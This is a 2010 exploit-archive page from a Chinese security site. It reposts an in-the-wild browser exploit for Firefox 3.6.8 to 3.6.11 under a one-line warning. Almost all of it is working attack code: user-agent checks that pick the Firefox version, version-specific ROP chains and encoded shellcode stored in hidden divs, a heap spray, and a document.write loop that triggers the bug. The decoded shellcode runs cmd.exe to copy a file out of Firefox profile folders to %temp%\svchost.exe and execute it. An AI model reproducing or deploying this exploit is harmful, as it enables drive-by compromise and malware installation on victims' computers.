首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From
来源:vfocus.net 作者:vfocus 发布时间:2010-11-01  

<!--

WARNING! This is exploit code from the wild.  The original first 2 unicode chars at 'id=sun8' were ub8acu1029. Use, as always, at your own risk.

<body>
<div style="visibility:hidden;width:0px;height:0px">
<div id=sun8>uccccuccccu0d00u0d0du0d00u102du1000u0d00u102du1000u102du1000u2853u1000u0011u0000u116cu1000u0300u7ffeub459u1002u6b99u1000ub333udeaduffffuffffu57a8u13e8u0000u0000u57a0u13e8u1000u0000u0040u0000u2853u1000u0001u0000u2853u1000u0000u0000u1af1u1000u9090u0febu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u5b58u1889u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000ufb83u74ffu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u830bu04c0u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uf3ebue890u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uffecuffffu7be4u1005u1af1u1000u57a8u13e8u116cu1000u57a8u13e8ub459u1002</div>
<div id=sun9>uef52u100auef52u100auef52u100auef52u100auef52u100auef52u100auef51u100au0011u0000u5500u1001u0300u7FFEud761u1004uff9cu1007uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000uef51u100au0001u0000uef51u100au0000u0000uce22u1003u9090u0FEBu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u5B58u1889u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFB83u74FFu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u830Bu04C0u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uF3EBuE890u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFFECuFFFFu9602u1001uce22u1003u57A8u0d78u5500u1001u57A8u0d78ud761u1004</div>
<div id=sun10>uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029u20F0u1011u0011u0000u1FC7u1052u0300u7FFEuFD6Du1001uA173u1007uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000u20F0u1011u0001u0000u20F0u1011u0000u0000u9405u1003u9090u0FEBuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u5B58u1889uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFB83u74FFuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u830Bu04C0uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uF3EBuE890uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFFECuFFFFuE541u1001u9405u1003u57A8u0d78u1FC7u1052u57A8u0d78uFD6Du1001</div>
<div id=sun11>u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc7u1000u0011u0000u827fu1000u0300u7FFEucda3u1000u6689u1000uB333uDEADuFFFFuFFFFu57A8u0d78u0000u0000u57A0u0d78u1000u0000u0040u0000u4bc7u1000u0001u0000u4bc7u1000u0000u0000u11a1u1000u9090u0FEBu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u5B58u1889u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFB83u74FFu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u830Bu04C0u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uF3EBuE890u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFFECuFFFFu3500u1007u11a1u1000u57A8u0d78u827fu1000u57A8u0d78ucda3u1000</div>
<div id=suv>uEC81u0120u0000uFC8BuC783uC704u3207u9174uC70Cu0447u138EuAC0Au47C7u3908u7DE2uC783u0C47u65A0uCB97u47C7u9310uE432uC794u1447uD550uCB9Bu47C7u4318uACBEuC7DBu1C47u36B2u130Fu47C7uC420u1F8DuC774u2447u2F51u01A2u47C7u5728u0D66uC7FFu2C47u879BuE58Bu47C7uED30uFFAFuC7B4u3447u19C2u014Bu47C7u7D38uA5F0uC79Au3C47u2BE4uC594u47C7uEC40u5F9DuC7A4u4447uD680u9AAFu8DE9u0000u3300u64C0u30A1u0000u8B00u0C40u408Bu8B14u8B00u8B00u1040uE88BuF78Bu116AuE859u0027u0000uF9E2u6DEBu8B5Bu6AEEu5300u55FFu6424u00A1u0000uC700u0440u0000u0000u00C7u0000u0000u00B8u0000uFF00u51E0u8B56u3C75u748Bu782EuF503u8B56u2076uF503uC933u4149u03ADu33C5u0FDBu10BEuD63Au0874uCBC1u0307u40DAuF1EBu1F3BuE775u8B5Eu245EuDD03u8B66u4B0Cu5E8Bu031Cu8BDDu8B04uC503u5EABuC359u6EE8uFFFFuE8FFuFF8EuFFFFu6D63u2E64u7865u2065u632Fu4620u524Fu2F20u2052u2522u5355u5245u5250u464Fu4C49u2545u4C5Cu636Fu6C61u5320u7465u6974u676Eu5C73u7041u6C70u6369u7461u6F69u206Eu6144u6174u4D5Cu7A6Fu6C69u616Cu465Cu7269u6665u786Fu505Cu6F72u6966u656Cu5C73u2022u6925u4920u204Eu2A28u2029u4F44u6920u2066u7E25u697Au6520u7571u2020u3834u3436u2030u6320u646Du652Eu6578u2F20u2063u6F63u7970u2220u6925u2022u2220u7425u6D65u2570u735Cu7663u6F68u7473u652Eu6578u2022u792Fu2620u2220u7425u6D65u2570u735Cu7663u6F68u7473u652Eu6578u0022uffffuffffuffffuffff</div>
</div>
<body>
<script src=scvhost.txt></script>
<script type="text/javascript">
function check(){
 var temp="";
 var user=navigator.userAgent.toLowerCase();
 var a=user.indexOf("windows nt 6.1");
 var b=user.indexOf("windows nt 6.0");
 var c=user.indexOf("firefox/3.6.8");
 var d=user.indexOf("firefox/3.6.9");
 var e=user.indexOf("firefox/3.6.10");
 var f=user.indexOf("firefox/3.6.11");
 if(a==-1&&b==-1&&c!=-1&&d==-1&&e==-1&&f==-1){
  temp="8";
 }
 else if(a==-1&&b==-1&&c==-1&&d!=-1&&e==-1&&f==-1){
  temp="9";
 }
 else if(a==-1&&b==-1&&c==-1&&d==-1&&e!=-1&&f==-1){
  temp="10";
 }
 else if(a==-1&&b==-1&&c==-1&&d==-1&&e==-1&&f!=-1){
  temp="11";
 }
 else {
  return temp="0";
 }
 return temp;
 
}
function de(su){
 var i;var sun = "";
 for (i = 0; i < su.length; i++){
  sun += String.fromCharCode(parseInt(su[i], 16));
  }
 return unescape(sun);
}
function code(beastk){
 var nop = "";
 var len = beastk.length;
 for (i = 0; i < len;) {
  nop = nop + "m" + beastk.substring(i, i + 5);
  i = i + 5;
 }
 nop = nop.split("m").toString();
 var temp = new Array();
 for (j = 0; j < nop.length; j++) {
  if (nop.charCodeAt(j).toString(16) == "2c") {
   temp.push("25");
  }
  else {
   temp.push(nop.charCodeAt(j).toString(16));
  }
 }
 return de(temp);
}
function getatts(str){
 var cobj=document.createElement(str);
 cobj.id="testcase";
 document.body.appendChild(cobj);
 var obj=document.getElementById("testcase");
 var atts = new Array();
 for(p in obj){
  if(typeof(obj[p])=="string"){
    atts.push(p);
  }
 } 
 document.body.removeChild(cobj);
 return atts;
}
var ck=check();
var bk="mp.ojsyex5";
var array = new Array();
var ls = 0x100000-(bk.length*2+0x01020);
var b1 ="";//////////////////////111111111111111111111111111111
if (ck == "0") {
 location.href = "about:blank";
}
else {

  if(ck=="8"){
   b1=code("u0d0du0d0d");
   }
  if(ck=="9"){
   b1=code("uef52u100a");
   }
  if(ck=="10"){
   b1=code("ub8b7u1029");
   }
  if(ck=="11"){
   b1=code("u4bc8u1000");
  }

 var b = b1;
 while (b.length < (0x85750 - 0x1000) / 2) {
  b += b1
 };
 
 ///////////////////////////////2222222222222222222
 var sun="";
 var sun8 = document.getElementById("sun8").innerHTML;
 var sun9 = document.getElementById("sun9").innerHTML;
 var sun10 = document.getElementById("sun10").innerHTML;
 var sun11 = document.getElementById("sun11").innerHTML;
 var suv = document.getElementById("suv").innerHTML;
 if(ck=="8"){
   sun=sun8;
   }
 if(ck=="9"){
   sun=sun9;
   }
 if(ck=="10"){
   sun=sun10;
   }
 if(ck=="11"){
   sun=sun11;
   }  
 b += code(sun + suv);
 for (u = 0; u < 8; u++) {
  b1 += b1;
 }
 while (b.length < ls) {
  b += b1;
 }
 var lh = b.substring(0, ls / 2);
 b = "";
 for (i = 0; i < 0x200; i++) {
  array[i] = lh + bk;
 }
 ////////////////////////////////////333333333333
 if(ck=="8"){
  b1=code("ub8a7u1029");
 }
 if(ck=="9"){
  b1=code("uab07u1006");
 }
 if(ck=="10"){
  b1=code("u8247u1009");
 }
 if(ck=="11"){
  b1=code("uf7e7u1017");
 }
 for (i = 0; i < 16; i++) {
  b1 += b1;
 }
 b = b1;
 while (b.length < ls) {
  b += b1;
 }
 lh = b.substring(0, ls / 2);
 b = "";
 for (i = 0x200; i < 0x500; i++) {
  array[i] = lh + bk;
 }
 
 var tags = new Array("audio", "a", "base");
 for (inx = 0; inx < 0x8964; inx++)
  for (i = 0; i < tags.length; i++) {
   var atts = getatts(tags[i]);
   for (j = 0; j < atts.length; j++) {
    var html = "<" + tags[i] + " " + atts[j] + "=a></" + tags[i] + ">" + tags[i];
    document.write(html);
   }
  }
}
</script>-->


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·mygamingladder MGL Combo Syste
·RoSPORA <= 1.5.0 Remote PHP Co
·PHPKit <= 1.6.1 R2 overview.ph
·yPlay v2.4.5 Denial of Service
·Debian <=5.0.6 /Ubuntu <=10.04
·Home FTP Server v1.11.1.149 RE
·Apache 2.0 - (apterous) file D
·SmallFTPD v1.0.3 Remote Direct
·CoWebserver Denial of Service
·MetInfo 2.0 PHP Code Injection
·DATAC RealWin SCADA 1.06 Buffe
·MetInfo 3.0 PHP Code Injection
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved